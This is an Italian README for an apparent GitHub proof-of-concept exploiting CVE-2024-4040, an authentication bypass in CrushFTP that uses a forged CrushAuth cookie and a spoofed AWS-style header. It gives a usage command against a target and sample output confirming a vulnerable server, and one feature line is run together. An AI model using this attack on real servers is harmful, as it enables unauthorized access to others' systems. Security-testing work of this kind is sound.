
Exploit per CVE-2024-4040 – Bypass dell'autenticazione in CrushFTP tramite cookie CrushAuth e spoofing di header in stile AWS. PoC Python stealthy con generazione sicura di token, bypass SSL e output migliorato.
Questo repository contiene un proof-of-concept (PoC) stealthy in Python per CVE-2024-4040, una vulnerabilità critica in CrushFTP (v10 e versioni precedenti) che consente a un attaccante di bypassare l'autenticazione utilizzando un cookie CrushAuth forgiato e un header Authorization in stile AWS.
Un attaccante non autenticato può bypassare l'autenticazione nelle istanze vulnerabili di CrushFTP creando una specifica combinazione cookie/intestazione, ottenendo accesso non autorizzato alle funzioni web interne.
CrushAuth utilizzando secretsAuthorization spoofato valido in stile AWSrequests)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — URL di base del server CrushFTP
--valid_username — Utente valido noto (predefinito: crushadmin)
🔍 Output di esempio
[*] CrushFTP Authentication Bypass Exploit
[*] Targeting: http://192.168.1.10:8080
[*] Using username: crushadmin
[+] Exploit Result:
Status_Code : 200
Response_Text : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP Server is VULNERABLE!
Questo codice è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. Non utilizzarlo contro sistemi che non possiedi o per i quali non hai ricevuto esplicita autorizzazione al test.
Refactoring del PoC: illdeed